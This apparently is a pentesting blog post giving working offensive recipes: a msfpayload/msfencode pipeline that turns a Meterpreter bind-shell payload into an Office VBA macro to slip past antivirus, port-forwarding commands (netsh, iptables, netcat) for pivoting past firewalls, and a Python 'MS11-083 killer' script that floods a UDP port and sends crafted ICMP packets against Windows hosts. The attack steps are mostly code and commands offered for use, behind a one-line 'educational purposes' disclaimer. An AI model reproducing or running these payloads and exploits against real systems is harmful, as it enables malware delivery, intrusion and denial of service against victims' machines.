Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (-x option) to work with the payload. This can be done in few simple steps:

1) Generate payload
2) Pipe it to msfencode with -x option ( use i.e. psexec.exe as template )
3) Use to create vbs script with binary representation of the code
4) Paste the output to the macro in Word, Excel or anything else from Office suite
5) Run “ShellcodeExecute” macro from inside of Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste ‘BIND_4999.vbs’ content into MSWord document as macro. Now upload it to crate a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted by i.e. firewall or its a DMZ.

Port forwarding on Windows

Sometimes almost a magical task but turns out that there is a way to easily forward the ports on windows by executing this command:

> netsh 
> interface portproxy add v4tov4 listenport=445 listenaddress=192.168.0.1 connectport=445 connectaddress=192.168.0.2

This will forward port 445 from 192.168.0.1 to 192.168.0.2 on windows.

As per Linux:

> iptables -A PREROUTING -t nat -i eth1 -p tcp --source 192.168.0.5 --dport 8080 -j DNAT --to 192.168.0.2:8080

If neither is accessible, then netcat can be used to send content of the stream to specific port:

nc -L -p 6555 | nc 192.168.0.2:8080  

MS11-083 killer

Following code will attempt to exploit the MS11-083 by sending specially crafted packets to closed UDP port ( read more here).

import socket
import threading

try:
    from dpkt.ip import IP                            
    from dpkt.icmp import ICMP
except:
    print "install dpkt if you want this program to run!"


print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"

############ EDIT THIS #################
UDP_IP="192.168.93.15"
UDP_PORT=839
MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
ThreadCount = 32
########################################

print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload lenght:", len(MESSAGE)

def customPing(UDP_IP,repeat):
    # craft custom ping
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))
    ip.data = icmp
    ip.len += len(ip.data)
    print "[+] Building socket for final ping"
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # sending packet
    print "[+] Sending final ping ( debug trap ) "
    for x in range(10):
        s.send(str(ip))

try:
  print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT 
  s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  s.setblocking(0) # set non-blocking mode
  class ThreadClass(threading.Thread):
      def run(self):
          c = 0
          while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter

              s.sendto( MESSAGE, (UDP_IP,UDP_PORT ))
          # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
          print "[+] Triggering actual attack "
          customPing(UDP_IP,20)
         
  for i in range(ThreadCount):
      t = ThreadClass()
      t.start()
      print "[+] Thread ",i," is starting and its name is : " , t.getName()
      
except Exception,e:
   print " [-] Exception occured, reason : " , e

Note that this code is only for the educational purposes and I do not take the responsibility for any missuses.